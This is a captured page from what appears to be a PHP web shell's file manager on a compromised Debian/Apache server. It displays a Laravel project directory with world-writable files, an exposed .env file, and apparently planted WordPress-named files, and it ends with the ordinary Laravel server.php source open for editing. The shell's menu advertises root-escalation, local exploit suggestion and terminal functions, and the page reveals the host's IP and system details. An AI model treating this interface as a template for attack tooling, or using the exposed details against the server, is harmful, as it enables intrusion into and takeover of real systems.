Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.173
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
.scripts
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
app
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
bootstrap
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
config
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
database
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
node_modules
[ DIR ]
drwxr-xr-x
2022-04-21 14:27
public
[ DIR ]
drwxrwxrwx
2022-04-21 13:49
resources
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
routes
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
storage
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
tests
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
vendor
[ DIR ]
drwxrwxrwx
2022-04-21 14:24
.DS_Store
10
KB
-rwxrwxrwx
2022-04-21 13:43
.editorconfig
220
B
-rwxrwxrwx
2022-04-21 13:43
.env
1.02
KB
-rwxrwxrwx
2022-04-21 13:47
.env.example
751
B
-rwxrwxrwx
2022-04-21 13:43
.gitattributes
111
B
-rwxrwxrwx
2022-04-21 13:43
.gitignore
198
B
-rwxrwxrwx
2022-04-21 13:43
.htaccess
197
B
-r--r--r--
2025-10-25 04:45
.styleci.yml
174
B
-rwxrwxrwx
2022-04-21 13:43
artisan
1.65
KB
-rwxrwxrwx
2022-04-21 13:43
composer.json
2.11
KB
-rwxrwxrwx
2022-04-21 17:40
package.json
1.59
KB
-rwxrwxrwx
2022-04-21 13:43
phpstan.neon
154
B
-rwxrwxrwx
2022-04-21 13:43
phpunit.xml
1.11
KB
-rwxrwxrwx
2022-04-21 13:43
readme.md
535
B
-rwxrwxrwx
2022-04-21 13:43
server.php
563
B
-rwxrwxrwx
2022-04-21 13:43
webpack.mix.js
549
B
-rwxrwxrwx
2022-04-21 13:43
wp-blog-header.php
2.73
KB
-r--r--r--
2025-10-25 04:45
wp-cron.php
2.73
KB
-rw-r--r--
2025-10-25 04:45
Save
Rename
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ $uri = urldecode( parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) ); // This file allows us to emulate Apache's "mod_rewrite" functionality from the // built-in PHP web server. This provides a convenient way to test a Laravel // application without having installed a "real" web server software here. if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) { return false; } require_once __DIR__.'/public/index.php';